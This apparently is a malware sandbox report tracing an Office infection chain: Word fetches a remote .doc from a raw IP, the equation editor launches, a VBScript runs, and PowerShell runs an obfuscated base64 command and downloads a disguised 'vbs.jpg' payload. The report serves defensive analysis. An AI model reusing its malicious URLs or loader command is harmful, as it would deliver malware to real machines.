                                                              2024-08-28 12:00:39 UTC144INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 72 65 3e 43 61 6e 6e 6f 74 20 50 52 4f 50 46 49 4e 44 20 2f 3c 2f 70 72 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Error</title></head><body><pre>Cannot PROPFIND /</pre></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              6192.168.2.224917245.83.105.924433784C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                              TimestampBytes transferredDirectionData
                                                              2024-08-28 12:00:39 UTC132OUTHEAD /GQ1oBm HTTP/1.1
                                                              User-Agent: Microsoft Office Existence Discovery
                                                              Host: a38.fr
                                                              Content-Length: 0
                                                              Connection: Keep-Alive
                                                              2024-08-28 12:00:40 UTC619INHTTP/1.1 302 Found
                                                              Server: nginx
                                                              Date: Wed, 28 Aug 2024 12:00:40 GMT
                                                              Content-Type: text/plain; charset=utf-8
                                                              Content-Length: 192
                                                              Connection: close
                                                              X-DNS-Prefetch-Control: off
                                                              X-Frame-Options: SAMEORIGIN
                                                              Location: http://137.184.234.91/77/cn/weneednewthingstogetmegreatthingsbuttersmoothchocolatecurnchiwaferwithnicebiscutwithentirethingstobegetmeback________newbuttersmoothbutter.doc
                                                              Vary: Accept
                                                              Strict-Transport-Security: max-age=63072000
                                                              X-XSS-Protection: 1; mode=block
                                                              X-Download-Options: noopen
                                                              X-Content-Type-Options: nosniff
                                                              X-Permitted-Cross-Domain-Policies: none
                                                              Referrer-Policy: same-origin


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              7192.168.2.2249175207.241.232.1544432692C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-08-28 12:00:47 UTC111OUTGET /27/items/vbs_20240726_20240726/vbs.jpg HTTP/1.1
                                                              Host: ia803104.us.archive.org
                                                              Connection: Keep-Alive
                                                              2024-08-28 12:00:48 UTC591INHTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Wed, 28 Aug 2024 12:00:48 GMT
                                                              Content-Type: image/jpeg
                                                              Content-Length: 1931225
                                                              Last-Modified: Fri, 26 Jul 2024 21:52:52 GMT
                                                              Connection: close
                                                              ETag: "66a41ab4-1d77d9"
                                                              Strict-Transport-Security: max-age=15724800
                                                              Expires: Wed, 28 Aug 2024 18:00:48 GMT
                                                              Cache-Control: max-age=21600
                                                              Access-Control-Allow-Origin: *
                                                              Access-Control-Allow-Headers: Accept-Encoding,Accept-Language,Authorization,Cache-Control,Content-Length,Content-Range,DNT,Pragma,Range,X-Requested-With
                                                              Access-Control-Allow-Credentials: true
                                                              Accept-Ranges: bytes
                                                              2024-08-28 12:00:48 UTC15793INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                              Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                              2024-08-28 12:00:48 UTC16384INData Raw: 5e 00 ef 9c 24 2f 18 a5 50 47 be 05 cf 22 c0 07 38 32 ed 0b c6 e0 78 c1 a8 76 2c e0 73 f9 61 20 0c c7 70 55 3f cf 00 eb 1b 86 0c 0d 31 5e e7 8c e4 29 1e e6 6b 69 5b d8 70 72 c4 b3 10 2a 82 8e 4d e0 47 a6 62 58 d8 a2 54 e0 5e 49 dd 95 6c b0 53 fa 65 e2 d4 2a 46 51 ad af 80 cd cf e5 80 33 21 52 a5 e9 6b f5 ca 39 67 e5 47 00 50 1e df 1c 06 91 bd 24 86 3f 4c 24 40 3b 04 1c dd d6 e3 f0 c0 23 05 88 1e 0d 8f d7 02 93 94 d4 2b d5 1b e9 81 a1 b9 3c 9d b2 39 dc 0f 16 7a 62 9a 92 24 22 9c d1 fc 36 7a e1 89 49 05 14 1d 48 27 03 ab 89 51 15 43 02 57 91 80 b7 96 fd bf 5c 6a 20 90 28 66 66 b3 cd 1e 99 10 4a be 71 63 f8 55 7f 8b f5 c8 9e 44 6a 23 6d 37 42 7d b0 0d e7 92 0d bb 12 4f 45 ed 83 92 41 b0 02 ec c7 e3 ef 96 8d 50 28 a2 02 f5 e3 be 53 52 51 3d 65 c6 eb bd b8 0b
                                                              Data Ascii: ^$/PG"82xv,sa pU?1^)ki[pr*MGbXT^IlSe*FQ3!Rk9gGP$?L$@;#+<9zb$"6zIH'QCW\j (ffJqcUDj#m7B}OEAP(SRQ=e
                                                              2024-08-28 12:00:48 UTC16384INData Raw: f0 9d 5e b6 53 3c 3a 0d 53 a1 3b 95 d2 16 65 27 e6 06 0a 2f 0e f1 0d 0f 8f f8 64 b2 e9 75 10 ee d4 25 6f 8d 97 70 0c b7 57 d7 ae 2b 21 6b 27 92 47 7c d4 fb 3f ae 74 f1 1d 26 9e 42 cf a6 79 d4 98 77 1d bb 89 00 30 07 a3 02 01 b1 c9 02 ba 1c 00 78 dd ff 00 b6 f5 fe 9e ba 89 2c 1f f7 8e 1b 41 e3 9e 23 a1 d2 88 74 fa 92 91 6e b0 0a 2b 57 e6 0e 03 c6 01 6f 1a d7 32 93 c6 a2 4b e7 fc c7 33 c3 ed 97 61 36 18 5f 07 a6 07 a6 d1 f8 f4 fe 31 aa 8f c3 bc 61 56 7d 3c cc aa a4 22 86 89 b9 0a ca 45 01 cd 5f c2 f0 2f 14 de 0b e2 3a bd 0d 40 ec 84 05 9d 92 da 98 58 2a 4d 55 83 ce 61 c2 83 cd 56 de 45 1b 0d 79 e9 7e da c8 f0 78 f4 25 4b 2a 9d 3a 8a aa 06 99 bf 97 1f a6 07 98 9a 18 b4 85 d1 f8 5d ea 49 db 5b b8 26 f1 b1 a7 46 98 ea 0b ab 44 57 f0 90 3a 64 c3 f6 76 79 cc 9a
                                                              Data Ascii: ^S<:S;e'/du%opW+!k'G|?t&Byw0x,A#tn+Wo2K3a6_1aV}<"E_/:@X*MUaVEy~x%K*:]I[&FDW:dvy
                                                              2024-08-28 12:00:48 UTC16384INData Raw: 22 b8 21 76 ed 24 f5 26 ef 29 b1 cc 21 4f b1 fe 77 9a 3a 96 d3 ed 06 fb 70 69 b0 11 ea 74 db 76 b3 57 3f e1 38 0a b2 c9 cb 15 04 b5 55 fc 06 39 a6 49 be ec c1 17 82 cc 48 6e 30 f2 b4 11 c4 24 0f 61 85 01 75 fa 60 e2 d7 c0 20 08 ec 45 7b 59 c0 16 e9 d8 10 a2 89 14 64 26 eb e0 32 57 4c f1 ca ae 3d 36 6c 0f 6e 2b 18 fb de 89 b8 46 2b e9 e1 48 3d 70 08 e8 eb 3e f6 3e a3 e9 ab f6 c0 12 e8 a4 3b 1c 1b 6d c4 9f 95 e7 0d 14 aa 9e c7 69 04 7b f5 1f d7 35 11 22 58 b6 86 6b be fe fc 65 e2 96 14 62 19 bd 4b d7 03 cf b8 78 ea 27 15 4c 0e 14 c6 ec 84 85 55 52 78 db d3 eb 9a 3a df ba 6a 01 b7 da dd 8e d3 c6 00 41 0a c2 b1 19 18 1b dc 4e d3 ce 00 19 a6 50 18 1b 53 c0 c6 00 d4 14 b1 dc 64 89 60 69 04 00 b0 03 ad a9 e7 19 33 e9 e3 50 bb bd 38 09 aa 4c e8 76 36 ea eb f0 ca
                                                              Data Ascii: "!v$&)!Ow:pitvW?8U9IHn0$au` E{Yd&2WL=6ln+F+H=p>>;mi{5"XkebKx'LURx:jANPSd`i3P8Lv6
                                                              2024-08-28 12:00:48 UTC16384INData Raw: 36 a4 9e 08 cc 94 d7 29 50 ad a6 0c 47 bb ff 00 fa 38 3d 4f 89 22 91 5a 52 40 eb 4f c7 f2 c0 d7 7d 44 25 54 02 d4 0f 3f 1c ef 32 33 54 8d f3 39 95 1e ba 29 53 71 d3 6d 07 a7 af fe 98 47 f1 08 c4 60 22 50 1f e6 ff 00 a6 03 af 22 75 22 89 e9 83 f3 d7 a1 4e 7b 1c cf 7d 68 75 07 cb 22 bb 06 eb ff 00 87 21 35 eb e6 57 92 47 c4 b7 fd 30 34 9d d1 9a ca 9e 7d b2 a5 c8 53 b5 5b eb 8b 36 b9 0a f0 95 ff 00 17 fd 32 a7 5e 40 a1 16 ef f8 bf e9 80 c1 d4 99 14 54 75 b7 f5 cb 89 14 29 40 80 1f c5 ce 27 f7 b7 5f 56 ca f8 06 ff 00 a6 0d b5 e7 ff 00 a3 62 7a fe 2f ff 00 47 01 d4 74 0c 09 8c dd f4 ae 0e 2d ac d7 3c 5a a2 13 d2 80 70 36 8c 85 d6 b6 d2 44 6c 19 45 82 5b fe 98 87 9c 4b 16 91 37 b3 1b fc 5f f4 c0 68 f8 d4 a7 d2 63 52 7b 15 5c d8 8e 7f 07 6d 27 df 75 69 e2 91 b1
                                                              Data Ascii: 6)PG8=O"ZR@O}D%T?23T9)SqmG`"P"u"N{}hu"!5WG04}S[62^@Tu)@'_Vbz/Gt-<Zp6DlE[K7_hcR{\m'ui
                                                              2024-08-28 12:00:48 UTC16384INData Raw: 8b 3d 6c 75 ca bc 9b a3 2a dd fa 71 db 28 20 6b 1b 9a d7 b5 60 32 91 16 76 51 b4 13 c2 8a eb 81 24 28 0a 0f e2 a3 5e fc e5 cb 32 15 60 f4 cb 8b 44 18 b0 bf 87 5f 9e 03 29 50 c6 ad ba c0 52 48 3f 3c be e1 aa 5d d5 b4 fb 60 a2 47 a2 4a d8 ae 8d c7 7c 22 c8 aa 28 0a 6f 81 c0 b1 57 24 10 d4 47 53 87 57 91 88 3c 16 e9 f1 ca c1 44 96 91 7d 23 93 c6 04 38 7b 02 c0 dc 5b 03 b5 6b 24 8f c8 2a 40 af 4a 91 78 ba 3c a9 48 59 b6 f4 17 d1 72 da 90 59 82 bb 8a ab 06 b2 fa 04 3f 79 8e a3 0c 03 03 fa e0 34 08 89 01 12 2b 33 75 bc 21 77 48 c8 2c a4 13 5e ac d5 83 cc 9a 59 42 ac 4d e6 44 19 c0 61 e8 3e ae 38 e6 fe 58 4d 52 99 fc 3c e9 d4 ed 2a b7 f8 89 ba 20 fe 74 0e 07 9e 96 14 f3 55 22 94 c8 59 80 65 b0 36 f4 c9 d4 ab e9 da 45 56 14 a6 95 94 7c 7a 7f 2c 79 3c 3d 9d 16 5d
                                                              Data Ascii: =lu*q( k`2vQ$(^2`D_)PRH?<]`GJ|"(oW$GSW<D}#8{[k$*@Jx<HYrY?y4+3u!wH,^YBMDa>8XMR<* tU"Ye6EV|z,y<=]
                                                              2024-08-28 12:00:48 UTC16384INData Raw: 2d 4a 56 e8 73 fc c6 65 1d 36 a9 a8 b4 32 d5 75 2a 70 b1 47 3a a3 20 d3 cb 4c 45 1d 97 5f a6 07 a3 9b 5a 9f 7a 84 c7 a6 02 37 45 90 33 b7 3c a8 f6 f9 e4 6a 66 79 19 a5 90 d0 03 90 00 20 01 81 82 37 5f 28 36 9b 51 21 1b 55 58 23 70 4a a8 e9 f9 e0 b5 d0 eb 1e 53 a7 5d 24 e5 14 06 94 aa 9b db 63 b6 04 69 99 35 13 2e a7 63 80 a4 aa 5f 17 c7 5c 63 c4 66 6d 1e 81 a4 85 dd 0b cc a5 97 cc 62 39 0c 7e 9d 4e 5b 4b 1c f3 32 a4 3a 69 4c 61 7d 2d e5 92 00 ec 3e 78 f4 f0 6a 53 c3 a7 12 68 e7 7d ae 80 a9 8c 83 c2 b5 9a ae 70 32 f4 1a 99 1c c9 01 05 98 b1 75 05 89 0c 09 ec 6e bf 3c 7a 3d 76 ad 19 55 f4 c6 23 b8 ab 30 91 78 5a e9 c1 cc a8 23 99 b5 60 e9 74 1a 99 02 16 2d 4a 40 ab e3 68 ed 9a 69 0e b9 d9 07 dc a6 48 d8 ee 2a c8 d7 7d b9 aa eb 58 0d e9 e4 4d 4f 88 c6 f2 28
                                                              Data Ascii: -JVse62u*pG: LE_Zz7E3<jfy 7_(6Q!UX#pJS]$ci5.c_\cfmb9~N[K2:iLa}->xjSh}p2un<z=vU#0xZ#`t-J@hiH*}XMO(
                                                              2024-08-28 12:00:48 UTC16384INData Raw: 18 01 03 9c 90 0f bf 6c b9 8e 94 b0 3c 55 fd 2e b2 de 58 0d b7 b8 6d a4 60 54 48 c0 83 67 82 0f 5e f9 01 ab a0 00 f4 04 75 c9 d8 0d 1b e0 93 fa 64 98 c9 23 6d 74 bb 26 b8 fa e0 54 b5 8e 7e 1c fc 32 18 b3 12 4f 5b cb f9 2c 5c a8 f5 10 2f d3 cf f2 c8 75 28 05 d8 24 5d 1f 9e 00 fe 99 c3 83 91 59 20 73 cf 4c 0b 33 16 1c b1 35 d2 fd b2 bd 0e 47 7c be df 48 3e fd 30 2e 93 15 52 0f 26 b8 bc d6 d0 ea 36 78 26 a6 32 dc b3 3d 7b 9b 51 98 80 73 9b da 5d 31 8f c2 64 2e ca 5a 51 e9 e3 91 b9 40 1f cf 03 08 83 66 fa fc f0 91 32 a9 16 47 5e f8 c7 fb 3a 63 e5 01 b4 17 2c 28 9f c2 57 ad e7 1d 0c 8a 81 88 52 4a ef 23 9f c3 ef d2 b0 28 fa 97 3b 68 f0 16 be 7c e0 0b b7 62 40 cd 3f f6 5f 96 17 cc 7b 25 c2 0a e3 93 f1 fa e2 b2 69 4a 5f ac 1b 24 55 f3 c7 bd 60 00 4c 7c b2 a4 93
                                                              Data Ascii: l<U.Xm`THg^ud#mt&T~2O[,\/u($]Y sL35G|H>0.R&6x&2={Qs]1d.ZQ@f2G^:c,(WRJ#(;h|b@?_{%iJ_$U`L|
                                                              2024-08-28 12:00:48 UTC16384INData Raw: b1 5f 33 d1 61 7e 27 ae 71 65 1c 85 60 4f 5b 6b fe 99 c5 3d 36 bc e7 20 05 1e fa ed e3 f3 18 16 03 cc 56 35 c2 8b eb 94 11 bb 29 2a 09 03 db 2a 2d 6c 13 5e e3 0a 26 db 13 22 9a dc 6c e0 04 06 3d 2f 25 56 cd 75 3e d8 53 3f ee d5 02 28 2b d1 80 e4 e7 42 ae cc 4a ae ea 16 6b f2 c0 8f 2d fa 9e 3e 67 fa e5 41 60 76 92 7a 8e 87 0a 8e f0 4d b8 a6 ea 04 15 71 ee 2b 91 95 92 51 34 e1 c2 aa 5d 0a ed 80 c3 99 c5 4b 23 bf 50 48 36 2b 9f ed ed 93 1f 88 49 f8 4b b2 93 54 77 1c 9d 74 85 8a a9 bb 0b b4 7a b7 0e d4 6f e4 71 51 03 34 05 c7 63 58 1b ba 4f 10 91 34 72 15 91 9e 4d a1 68 b1 f7 ab 1f a6 35 ab d6 4b f7 69 5a 19 59 77 39 a0 77 5f 40 4f 73 c8 00 f3 55 9e 6a 09 8c 3b 88 e6 c5 57 6e 08 39 b3 0f 8a c3 a8 d3 b4 73 22 06 dc cc 5d ae e8 d0 a1 5c f2 2c 7d 70 18 07 57 ad
                                                              Data Ascii: _3a~'qe`O[k=6 V5)**-l^&"l=/%Vu>S?(+BJk->gA`vzMq+Q4]K#PH6+IKTwtzoqQ4cXO4rMh5KiZYw9w_@OsUj;Wn9s"]\,}pW
                                                              2024-08-28 12:00:48 UTC16384INData Raw: 47 b2 68 df 68 89 dd 18 31 e7 69 e8 73 22 79 c6 ae 09 64 50 54 a8 16 b7 67 93 5f d7 01 e2 91 bb 34 77 41 ba 8f 7c 6e 1d 12 41 a7 54 46 b5 26 d8 5d 58 cc e4 d3 38 86 4a 2d 6a a5 aa b9 e9 8f c0 e4 68 61 06 b7 6c 05 ad 79 e9 80 e4 3a d5 82 0a 2c cc aa 0a 84 02 c9 17 c1 fa 63 47 50 82 16 6d aa 48 ea 6e ae c7 71 98 da c1 10 d3 87 2c 48 50 58 02 d4 2c f0 3f 5c 2e a5 1c f8 7a f9 8c c9 24 71 d8 65 66 04 10 2f 9e 70 3b 57 af 82 02 db d2 46 90 11 c0 52 36 8f 70 7a 65 22 68 e5 1b fc d0 e8 bf 85 80 b2 3e bf 5c 8d 24 b3 b4 65 66 f2 d9 50 2b 33 51 e4 37 c4 e6 66 b3 53 16 96 79 74 ba 78 94 2a bd 6e 1c dd 7c f0 36 5e 78 a1 87 71 5d e7 f8 16 e8 93 81 2a e3 f1 9b 24 6e f4 f4 53 ed 78 a2 b1 9a 1d 36 a6 28 0a 48 f3 aa 31 56 bd dc 1e d9 ab a9 46 d3 c4 01 52 64 24 80 a4 f2 7a
                                                              Data Ascii: Ghh1is"ydPTg_4wA|nATF&]X8J-jhaly:,cGPmHnq,HPX,?\.z$qef/p;WFR6pze"h>\$efP+3Q7fSytx*n|6^xq]*$nSx6(H1VFRd$z


                                                              Click to jump to process

                                                              Click to jump to process

                                                              Click to dive into process behavior distribution

                                                              Click to jump to process

                                                              Target ID:0
                                                              Start time:08:00:01
                                                              Start date:28/08/2024
                                                              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                              Imagebase:0x13f3b0000
                                                              File size:28'253'536 bytes
                                                              MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:false

                                                              Target ID:4
                                                              Start time:08:00:23
                                                              Start date:28/08/2024
                                                              Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
                                                              Imagebase:0x13f9b0000
                                                              File size:1'423'704 bytes
                                                              MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:false

                                                              Target ID:9
                                                              Start time:08:00:40
                                                              Start date:28/08/2024
                                                              Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                              Imagebase:0x400000
                                                              File size:543'304 bytes
                                                              MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:10
                                                              Start time:08:00:41
                                                              Start date:28/08/2024
                                                              Path:C:\Windows\SysWOW64\wscript.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weneedsmoothbunwithbutterc.vBS"
                                                              Imagebase:0x790000
                                                              File size:141'824 bytes
                                                              MD5 hash:979D74799EA6C8B8167869A68DF5204A
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:11
                                                              Start time:08:00:42
                                                              Start date:28/08/2024
                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?RQBO? ? ? ? ?EQ? ? ? ? ?Pg? ? ? ? ?+? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?BP? ? ? ? ?GY? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?E8? ? ? ? ?Zg? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBn? ? ? ? ?GU? ? ? ? ?I? ? ? ? ?? ? ? ? ?w? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBn? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?Ow? ? ? ? ?k? ? ? ? 